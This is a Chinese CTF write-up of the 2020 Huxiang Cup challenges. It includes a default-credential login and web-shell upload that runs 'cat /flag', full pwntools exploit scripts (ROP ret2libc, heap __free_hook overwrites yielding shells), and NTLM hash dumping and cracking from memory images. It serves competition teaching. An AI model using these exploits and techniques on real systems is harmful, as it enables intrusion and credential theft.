2020湖湘杯部分WriteUp

the_one  1511天前

Web

1、题目名字不重要反正题挺简单的

http://ip.55:53001/?file=phpinfo

给 phpinfo 还把 flag 放在变量里可还行

DASCTF{9ef7f60bdddfb4671bb6e6cc77dcc0c5}

4、NewWebsite

http://ip:54500/Readme.txt

AWD 的题,直接找简单洞就行了

http://ip:54500/?r=content&cid=15

注入可以跑,但是表里找了一圈没 flag

http://ip:54500/admin/?r=index#

admin/admin 进后台

http://ip:54500/admin/?r=imageset

图片上传,php3 phtml 什么的都行

http://ip:54500//upload/watermark/36921604228866.phtml?911=cat%20/flag

DASCTF{716e7efa46a724eaedacf019682b02ca}

Pwn

1、pwn_printf

第九个参数为 read 参数,要求 0x20 得大小,存在栈溢出

1.png

 2.png

 

第一 leak 出 libc  返回到 read 函数

第二次 getshell

from pwn import *

import time

context.log_level ='debug'

sh =remote('ip',56806)

elf =ELF('./pwn_printf')

puts_plt=elf.plt['puts']

puts_got=elf.got['puts']

libc = ELF('./libc6_2.23-0ubuntu11.2_amd64.so')

main = 0x4007ef

pop_rdi =0x0000000000401213

sh.recvuntil("You will find this game very interesting\n")

for i in range(15):

 sh.sendline(str(0x20))

 time.sleep(0.1)

sh.sendline(str(0x20))

sh.sendline(p64(0x0000000000603028+0x10068)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(0x401172))

libc_addr  =u64(sh.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-libc.symbols['puts']

log.info('libc'+hex(libc_addr))

 

sh.sendline(8*'a'+p64(pop_rdi)+p64(libc_addr+libc.search("/bin/sh").next())+p64(libc_addr+libc.symbols['system'])+p64(0x401172))

sh.interactive()

flag DASCTF{67f3a3150ca23790e1f83ac28bc739be}

2、blend_pwn

标准 菜单堆题

存在字符串格式化漏洞 leak libc 地址

写入 cat flag

通过 666 拿到 flag


3.png4.png

 

from pwn import*

context.log_level ='debug'

#p = process('./blend_pwn')

p =remote('ip',53204)

elf=ELF('./blend_pwn')

def showneme():

 p.sendlineafter('>','1')

def add(note):

 p.sendlineafter('>','2')

 p.sendlineafter('note:',note)

def free(idx):

 p.sendlineafter('>','3')

 p.sendlineafter('>',str(idx))

def show():

 p.sendlineafter('>','4')

p.sendline("%p%p")

showneme()

p.recvuntil("0x")

stack_addr = int(p.recv(12),16)

p.recvuntil("0x")

libc_base = int(p.recv(12),16)-0x3c6780

og = [0x45226,0x4527a,0xf0364,0xf1207]

one = libc_base+og[0]

add(p64(0)*3+p64(one))

add("a"*0x60)

free(0)

free(1)

show()

p.recvuntil("2:")

heap_base = u64(p.recvuntil("\n")[:-1].ljust(8,"\x00"))

p.sendline("666")

p.recv()

p.sendline("A"*0x20+p64(heap_base+0x20)+'A'+'catflag')

p.interactive()

flag:831a8e502383f4f3dd5ce63db9846f68

4、babyheap 

又是一个菜单堆题   增删改查


5.png6.png

Show 功能存在越界读

打 free hook 为 system

输入/bin/sh getshell

from pwn import *


path = './babyheap'

 

context.log_level = True

 

libc=ELF('libc.so.6')

#p =process(path,env={"LD_PRELOAD":"libc.so.6"})

p = remote(ip,  51503)

def add():

       p.recvuntil(">>")

       p.sendline("1")

def edit(id,size,data):

       p.recvuntil(">>")

       p.sendline("3")

       p.recvuntil("index?\n")

       p.sendline(str(id))

       p.recvuntil("Size:\n")

       p.sendline(str(size))

       p.recvuntil("Content:\n")

       p.send(str(data))

def show(id):

       p.recvuntil(">>")

       p.sendline("2")

       p.recvuntil("index?\n")

       p.sendline(str(id))

def delete(id):

       p.recvuntil(">>")

       p.sendline("4")

       p.recvuntil("index?\n")

       p.sendline(str(id))

show(-7)

base=u64(p.recv(6).ljust(8,'\x00'))-8

for i in range(8):

       add()

for i in range(8):

       delete(7-i)

for i in range(8):

       add()

edit(7,0xf0,'aaaaaaaa')

show(7)

p.recvuntil('a'*8)

leak=u64(p.recv(6).ljust(8,'\x00'))

print hex(leak)

libcbase=leak-(0x7ffff7dcfca0-0x00007ffff79e4000)

show(0)

heap=u64(p.recv(6).ljust(8,'\x00'))-0x460

for i in range(3):

       add()

delete(8)

delete(9)

delete(10)

delete(3)

delete(4)

delete(5)

delete(6)

delete(7)

for i in range(8):

       add()

payload=p64(heap+0x250)*2

edit(10,0xf8,payload)

for i in range(7):

       delete(i+1)

delete(0)

for i in range(7):

       add()

add()

delete(0)

delete(1)

delete(7)

free=libcbase+libc.sym['__free_hook']

edit(10,8,p64(free))

add()

add()

system=libcbase+libc.sym['system']

edit(1,8,p64(system))

edit(2,8,'/bin/sh\x00')

delete(2)

p.interactive()

 
7.png

Re

1、easyZ

target_arr = []

with open('extract1.txt','r') as f:

    for line in f:

       target_arr.append(line.split(" ")[2:6])

    # print(target_arr)

    tmp_arr = []

    for j in range(8):

        tmp_arr+= target_arr[j]

        #print(tmp_arr)

    target_arr = [int(num,16) fornum in tmp_arr]

    print(target_arr)

with open('extract.txt','r') as f:

    init_arr = []

    for line in f:

       init_arr.append(line.split(" ")[2:6])

    # print(init_arr)

    true_arr = []

    for i in range(3):

        tmp_arr= []

        for j inrange(8):

           tmp_arr += init_arr[i * 8 + j]

       true_arr.append(tmp_arr)

    print(true_arr)

    final_arr = []

    for row in true_arr:

       final_arr.append([int(num,16) for num in row])

    print(final_arr)

    res = ''

    for i in range(32):

        for gcin "0123456789abcdef":

           if (ord(gc) * ord(gc)) * final_arr[0][i] + final_arr[1][i] * ord(gc) +final_arr[2][i] == target_arr[i]:

               res += gc

               print(gc)

    print(res)

 flag:8eb5d8b632dae2a5167e3e1c4884eef9

2、easyre

没啥好说的一道题,ida 打开有点乱,动态调试

爆破可得,flag 是输入的,所以逆算法


1.png

 

手动汇编转 C 嘛,难度不大,因为追了一遍发觉算法简单


2.png

 

然后发觉我不会逆这个算法,卡了半个多钟有余,然后就突然想到这就是解方程,z3 上去即可

from z3 import *

length = 0x18

 

input = [BitVec('u%d'%i,32) for i inrange(0,length)]

solver = Solver() 

#solver.add(117 * input[0]*117 == ans[0])

List = [0x2B,0x08,0xA9,0xC8,0x97,0x2F,0xFF,0x8C,0x92,0xF0,0xA3,0x89,0xF7,0x26,0x07,0xA4,0xDA,0xEA,0xB3,0x91,0xEF,0xDC,0x95,0xAB]

 

temp = input[0] & 0xE0

 

for i in range(0x17):

    solver.add( (( (input[i] <<0x3) | (input[i+1] >> 0x5) )& 0xff )^ i == List[i] )

 

solver.add((((temp)>>0x5)|(input[0x17]<<0x3))&0xFF== List[0x17])

# input[0x17]= input[0x17] << 0x3

# temp = temp >> 0x5

# input[0x17] = (input[0x17] | temp) & 0xFF

print(solver)

 

for i in range(length):

    solver.add(input[i] < 255)

    solver.add(input[i] > 0)

 

solver.check()

result = solver.model()

print(result)

flag = ''

for i in range(0,0x18):

    flag +=chr(result[input[i]].as_long().real)

print(flag)

flag:ea5yre_1s_50_ea5y_t0_y0u

3、ReMe

经典的exe2py 题目,本来用个 exe2py 项目转的,奈何转不了,自己将解包后 struct 头替换掉原来的 ReMe 的头,用 uncompyle6 即可拿到源码


3.png

 

拿到源码后,懒得看代码逆向了,发觉可以爆破

二话不说开始爆破

# uncompyle6 version 3.7.4

# Python bytecode 3.7 (3394)

# Decompiled from: Python 3.8.5 (default, Aug 2 2020, 15:09:07) 

# [GCC 10.2.0]

# Embedded file name: ReMe.py

import sys, hashlib

check = [

 'e5438e78ec1de10a2693f9cffb930d23',

 '08e8e8855af8ea652df54845d21b9d67',

 'a905095f0d801abd5865d649a646b397',

 'bac8510b0902185146c838cdf8ead8e0',

 'f26f009a6dc171e0ca7a4a770fecd326',

 'cffd0b9d37e7187483dc8dd19f4a8fa8',

 '4cb467175ab6763a9867b9ed694a2780',

 '8e50684ac9ef90dfdc6b2e75f2e23741',

 'cffd0b9d37e7187483dc8dd19f4a8fa8',

 'fd311e9877c3db59027597352999e91f',

 '49733de19d912d4ad559736b1ae418a7',

 '7fb523b42413495cc4e610456d1f1c84',

 '8e50684ac9ef90dfdc6b2e75f2e23741',

 'acb465dc618e6754de2193bf0410aafe',

 'bc52c927138231e29e0b05419e741902',

 '515b7eceeb8f22b53575afec4123e878',

 '451660d67c64da6de6fadc66079e1d8a',

 '8e50684ac9ef90dfdc6b2e75f2e23741',

 'fe86104ce1853cb140b7ec0412d93837',

 'acb465dc618e6754de2193bf0410aafe',

 'c2bab7ea31577b955e2c2cac680fb2f4',

 '8e50684ac9ef90dfdc6b2e75f2e23741',

 'f077b3a47c09b44d7077877a5aff3699',

 '620741f57e7fafe43216d6aa51666f1d',

 '9e3b206e50925792c3234036de6a25ab',

 '49733de19d912d4ad559736b1ae418a7',

 '874992ac91866ce1430687aa9f7121fc']

 

 

def func(num):

    result = []

    while num != 1:

        num = num * 3 + 1 ifnum % 2 else num // 2

        result.append(num)

    return result

 

if __name__ == '__main__':

    inp = [10]*27

    if len(inp) != 27:

        print('length error!')

        sys.exit(-1)

    flag = ''

    for i, ch in enumerate(inp):

        for each_num inrange(30,128):

            ret_list= func(each_num)

           print(ret_list)

            s = ''

            for idxin range(len(ret_list)):

               s += str(ret_list[idx])

               s += str(ret_list[(len(ret_list) - idx - 1)])

            print(s)

           print("-------------------")

            md5 =hashlib.md5()

           md5.update(s.encode('utf-8'))

            ifmd5.hexdigest() != check[i]:

               continue

            else:

               flag += chr(each_num)

               print(flag)

               break

        inp = flag

 

    md5 = hashlib.md5()

    md5.update(inp.encode('utf-8'))

    print('You win!')

    print('flag{' + md5.hexdigest() +'}')

# okay decompiling ReMe1.pyc

 4.png

flag:flag{0584cfa2ce502951ef5606f6b99fc921}

4、easy_c++

送分题,直接异或得到结果

result = '7d21e<e3<:3;9;ji tr#w"$*{*+*$|,'

flag = ''

for i in range(32):

   flag += chr(ord(result[i])^i)

print(flag)

flag:7e02a9c4439056df0e2a7b432b0069b3

Misc

1、颜文字之谜

流量包 导出 http 对象

打开 html 文件 查看源代码 发现一段base64 编码

解码出颜文字

base64 隐写

def get_base64_diff_value(s1s2):

    base64chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'

    res = 0

    for i in xrange(len(s2)):

        if s1[i] != s2[i]:

            return abs(base64chars.index(s1[i]) - base64chars.index(s2[i]))

    return res

 

def solve_stego():

    with open('1.txt''rb'as f:

        file_lines = f.readlines()

        bin_str = ''

        for line in file_lines:

            steg_line = line.replace('\n''')

            norm_line = line.replace('\n''').decode('base64').encode('base64').replace('\n', '')

            diff = get_base64_diff_value(steg_line, norm_line)

            print diff

            pads_num = steg_line.count('=')

            if diff:

                bin_str += bin(diff)[2:].zfill(pads_num * 2)

            else:

                bin_str += '0' * pads_num * 2

            print goflag(bin_str)

 

def goflag(bin_str):

    res_str = ''

    for i in xrange(0len(bin_str), 8):

        res_str += chr(int(bin_str[i:i + 8], 2))

    return res_str

 

if __name__ == '__main__' :

    solve_stego()

  

1.png

flag:67b33e39b5105fb4a2953a0ce79c3378

2、passwd

we need sha1(password)!!!附件下载链接: https://pan.baidu.com/s/1vXUF3Fdvz9Wj4vEJwQdAow 提取码:****

imageinfo 拿到模板

volatility -f WIN-BU6IJ7FI9RU-20190927-152050.raw--profile=Win7SP1x86 hashdump

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

CTF:1000:aad3b435b51404eeaad3b435b51404ee:0a640404b5c386ab12092587fe19cd02:::

解出 CTF 用户 NTLM hash,qwer1234

sha1 编码:c0206653cd8308cd738f0c69c7d84ba2

3、虚实之间

winhex 修复压缩包,拖出 mingwen - 副本.txt

明显的明文攻击,但是试了很久 ARCHPR 都报错出不了。。。

换成 AZPR_4.0,然后压缩成 zip,跑出密码 123%asd!O

解压得到 ffd5e341le25b2dcab15cbb}gc3bc5b{789b51

根据提示,栅栏 5 格

flag{febc7d2138555b9ebccb32b554dbb11c}

4、隐藏的秘密

重命名成了 a.vmem,imageinfo 拿到模板后

volatility -f a.vmem --profile=Win2003SP2x86hashdump


出来一堆用户名还以为出问题了,后来看了好久 notepad 的进程也没啥东西

队友死马当成活马医,把所有的 ntlm hash 复制出来,放到 cmd5 批量解密

解出来的值 md5 后,放到平台上暴力尝试了 用户名/ 密码 / 用户名和密码

最终发现 FHREhpe$:NIAIWOMA 这个隐藏用户对了,什么鬼脑洞题

8cf1d5b00c27cb8284bce9ccecb09fb7

Crypto

1、LFSXOR

参考: https://blog.csdn.net/qq_37672864/article/details/102519409

from pylfsr import LFSR

import itertools

import re

def xor(a, b):

    returnstr(chr(a ^ b)).encode('l1')

def encode(content, key):

    tmp = b''

    for i inrange(len(content)):

        tmp+= xor(content[i], key[i % len(key)])

    returntmp

 

 

enc1 =b'\xbb\xd3\x08\x15\xc6:\x08\xb2\xb2\x9f\xe4p\xc7\xec\x7f\xfd)\xf6f\x9c\xe4\xd12\xaeJ\x81\xb1\x88\xab\xa5V\xa9\x88\x14\xdf`~\xf6\xdbJ\xb4\x06S!0\xbb\xe4\x1a\xe6R\x8e\x84X\x19K\x95\x07C\xe8\xb2\'\xa9\x80\x15\xec\x8f\x8dY\nK\x85\x99\xb7!\x134\xa9\xb6\x15\xcf&\r\x9b\xe1\x99\xe4]3h~\xf0\xa9\xa5\x14\xee}\xd19l\x14h\x07v*a0\x12\x14\xfe\x0f\x05\xdem\x1d\xe4s2J\x7f\xc28\xf6RR\x8e\xba\xb2m\x18M\xf1\xef!4\x17\xa8\xb4\x14\xc2\x8f\xb9Y:K\xaa\x06T!\x1b\xbb\xfd\xf6Gv\x8e\x9a\xeb\xd9K\xbb\x06N\x9a\x82c\xa9\xa0\x14\xed!\x04\xdbm\x13\xe5w3B\x7f\xd0\xa9\xbf\xb7\x9c\xe3\xd00\x83K\x86\xab3\x7f\xc1\xbb\xfd\x11\x15\xdf\x8e\x80Y\x07\xd8\xe5]2m\xe9\xbb\xce`\x91o\x8f\x8cY!\x81\xe4J\x92\x8c\xa7T\x16E\x15\xf1WMY(\xb8[\x8e2y~\xcbM\x10\x15\xc7\x1fWY\x0cK\x87\xce\xe5!b\xa8\x83\x14\xec6\xd1!\xc8\x905\xe52L\xf1\xba\xcf\n\x9d\x9d\xe7u\xadm\x06\xe4n2r\xd8\xba\xed\xf6\x7f\x9d\xd8\xd02m\x12G\x07Y\x89\x7f\xc0\xa8\xa4\x15\xe5\x043Y\x1eJ\xae\x07n\x94\x87\xbb\xcf_\x8d\x9d\xd1\x14Y,\x9e\xe5b\xd7\x8c\x7f\xf7\xa8\x8f\x14\xc7\x8f\xb3\xb6\xf1\x93\xe4O\xdd\xc4\xdb\xba\xf6!\x15\xfd.\xd1\x18\xcf\xf6\x03\xea2E\x7f\xe1\xa9\xa5\xfe\x9d\xc9\xd1;\xd9\xee\x05\x06z\xc8\xb2\xbb\xe2\xf7{JW4\xcdm\x1a\xe5U\x8d\x0f&\x14\x7f\xf6\x9d\xd4E\xbf\xc3\xdb\xe4L\xe1\xf7\x90\xbb\xdaZ\xf4\x9d\xd13\xb8m3\xe2D3o~\xf8H\xf6U*\x07lY\x03K\xab\x07~\xa3\x87\xbb\xc9\xf7sAQ\x08Y6J\x86\x07Y\xec\xf7\xbb\xc6s\x15\xc6\x7fEY\x02J\x95\x07Z\x11\xbb\xc6T\x15\xfc-\xd0\x06\xe6\x9f-\x07^ \x15\xbb\xccz\x14\xf3\x8f\x97\xd4l9t\x85\xe8\x8a\xbe\xbb\xf9\xf6f\x9d\xf2\xd19\xa2K\xb6\xcd\xcf\xf6~\xd5\xa9\xaa\x15\xd8\x8e\xb3\x81m9\xe4f\xb2!\x1e\xba\xd8s\xfd\x11\x08W\xa1l;\x01\x07_!\x11\xbb\xdd\xf6x\x9d\xf0\x17Y\x15\xfe\x02\xc7\xa0!.W\xa9\xa5\x8f\x9c\xe8\xd1\x12m\x04\xe5s3Q~\xdd\xa9\xa3\x15\xdb\x8f\xac\xaf\xec\xbb\x10\xde2_\xba\xba\xe8\xf6f.\x1e\xd1\x17l\x06\xe4U\xdd\xf0\xd6~\x0fA\x14\xcb\x8e\xb0Y\x1fJ\xb2\xe4\xb3!"\xba\xfeU\x14\xedY\xd0>l-~\x06P1\xbb\xf2\xf6waD\xd1(m\x12`\x06@\xb6~\xfa\xa9\xb1\xb0\x9d\xfb\x18\xfbm&\xe4v2w\xce\xba\xcbo\xd5\x07\x11QX<J\xbd\xb22O\x7f\xd8x>\xc8\x9c\xd3\xd03\x9d\xb5\x1e\xd72S\xf2ry\xf1W\x9c\xc89Y\rK\x8f\xff\x8a\xe0\xb5{\xa9\xae\xb1\x9d\xdd\xd1=\xbeK\xa3\x06e!\x08\xba\xd2\xf6j\x9c\xf6\xd0\x0fl#\xe5o\xf5\xaa~\xc2\xa9\x99\x15\xea6\xd1:\xe7\xa8\xe4n\xbb\nV\xa9\x91\x14\xf9}\xd0!m/\xe5|2o\x81\xba\xf8\r\x14\xeb\tR\xc9\xec\xdd`\xbf\xc6\x81\xdfKXW\xb3o.%\xa9\xcd\xb9\x14\xfd\x97\x83\x8eO\n\x03\xb6iuu\xab\x9d\xbc\x15\xf4\xc3\xd6\xc1'

flag = b'DASCTF{'

print(len(enc1))

for start in range(770, 771):

   print(start)

    key_char= []

    key_index= []

    for i inrange(7):

        char= xor(enc1[i + start], flag[i])

       key_char.append(char[0])

        index= (i + start) % 15

       key_index.append(index)

    for x initertools.product([1, 0], repeat=4):

       print(x)

        L4 =LFSR(fpoly=[4, 3], initstate=list(x))

        data= L4.runFullCycle()

        k4 =''

        for _in range(len(data)):

            a= ''

           for _ in range(8):

               a += str(L4.next())

           k4 += chr(int(a, 2))

       is_match = True

        forchar in key_char:

           if chr(char) not in k4:

                is_match = False

               break

        ifis_match:

           print('match')

            #print(key_char)

            #print(key_index)

        else:

           continue

        k4 =[ord(k) for k in k4]

        k4 =list(set(k4) - set(key_char))

        for yin itertools.permutations(k4, len(k4)):

           key = (''.join([chr(_) for _ in y])).encode('l1')

           key = key[:5] + (''.join([chr(_) for _ in key_char])).encode('l1') +key[5: 8]

           content = encode(enc1, key)[770:].decode('l1')

           if re.match(r'DASCTF\{[0-9a-f]{32}\}', content):

               print(content)

               exit()

flag:7cc33bd1c63b029fa25a6a78f1253024

2、古典美++

https://github.com/atomcated/Vigenere

https://atomcated.github.io/Vigenere/

得到密钥 ordeyby,全大写 md5

c82bbc1ac4ab644c0aa81980ed2eb25b

3、简单的密码 3


2.png

5dd56e94dc11423e8bdb36b5d87a0


本文为白帽汇原创文章,如需转载请注明来源:https://nosec.org/home/detail/4599.html

最新评论

A  :  牛**
1511天前 回复
123  :  123
1511天前 回复
阿月浑子  :  骗我,好渣
1501天前 回复
昵称
邮箱
提交评论